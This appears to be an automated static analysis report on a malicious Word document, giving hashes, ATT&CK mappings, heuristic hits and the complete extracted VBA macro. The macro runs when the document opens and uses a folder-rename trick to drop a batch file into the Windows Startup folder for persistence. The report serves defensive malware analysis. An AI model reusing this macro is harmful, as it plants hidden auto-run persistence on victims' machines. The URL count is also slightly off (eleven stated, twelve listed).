Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 32f1b8401beba0d4…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 18.6 KB
Created: 2021-10-25 07:46:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2021-10-27
MD5: e254ce48326f90836ff2ce24d26c3e36
SHA-1: 83a553f93bd8d455e01845da5d894512b7bb487d
SHA-256: 32f1b8401beba0d4eb419c352970055ff9fe20fa20a63bc42f5bc0f309e095cb
Risk Score: 270

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.003 Windows Command Shell
  • T1547.001 Registry Run Keys / Startup Folder

The sample contains a VBA macro (Document_Open) that runs as soon as the document is opened. The macro uses WScript.Shell to locate the user's Startup folder, renames that folder (replacing 'Startup' with 'test' in its path), creates a batch file named 'test.bat' containing 'cmd.exe' inside the renamed folder, and then renames the folder back to its original name, so that 'test.bat' ends up inside the real Startup folder. This sequence of actions aims to establish persistence by ensuring 'test.bat' executes on system startup.

Heuristics (8)

  • VBA project inside OOXML (severity: medium; 6 related findings; rule: OOXML_VBA)
    Document contains a VBA project (VBA macros present).
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Matched lines in script:
    Set objFileSystem = CreateObject("Scripting.FileSystemObject")
    OldStartup = CreateObject("WScript.Shell").SpecialFolders("Startup")
    NewStartup = Replace(OldStartup, "Startup", "test")
  • WScript.Shell usage (severity: critical; rule: OLE_VBA_WSCRIPT)
    Matched lines in script:
    Set objFileSystem = CreateObject("Scripting.FileSystemObject")
    OldStartup = CreateObject("WScript.Shell").SpecialFolders("Startup")
    NewStartup = Replace(OldStartup, "Startup", "test")
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    Matched lines in script:
    Private Sub Document_Open()
    Set objFileSystem = CreateObject("Scripting.FileSystemObject")
    OldStartup = CreateObject("WScript.Shell").SpecialFolders("Startup")
  • cmd.exe reference in VBA (severity: high; rule: OLE_VBA_CMD)
    Matched lines in script:
    Set objFile = objFSO.CreateTextFile(NewStartup & "\test.bat", True)
    objFile.Write "cmd.exe"
    objFile.Close
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (severity: low; rule: OLE_VBA_DOCOPEN)
    Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    Set objFileSystem = CreateObject("Scripting.FileSystemObject")
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All eleven URLs below are standard OOXML/WordprocessingML XML namespace URIs, which every .docx file carries, rather than network indicators.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (In document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (In document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (In document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (In document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (In document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (In document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (In document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (In document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (In document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (In document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (In document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (In document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 902 bytes
SHA-256: 816eb58f50bdea41065e2737f2ac350aa459c038c43616ef35d09b4f103d009c
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Set objFileSystem = CreateObject("Scripting.FileSystemObject")
OldStartup = CreateObject("WScript.Shell").SpecialFolders("Startup")
NewStartup = Replace(OldStartup, "Startup", "test")
Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.FolderExists(NewStartup) = False Then
 'Rename the original folder
 Name OldStartup As NewStartup
 'Write File to ranmed startup
 Set objFile = objFSO.CreateTextFile(NewStartup & "\test.bat", True)
 objFile.Write "cmd.exe"
 objFile.Close
 'Rename back to original folder name
 Name NewStartup As OldStartup
End If
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 13312 bytes
SHA-256: 2ae471e9cfc0ad0a676c6305799d925a9814f9700885de57c2ecb12db7c0b304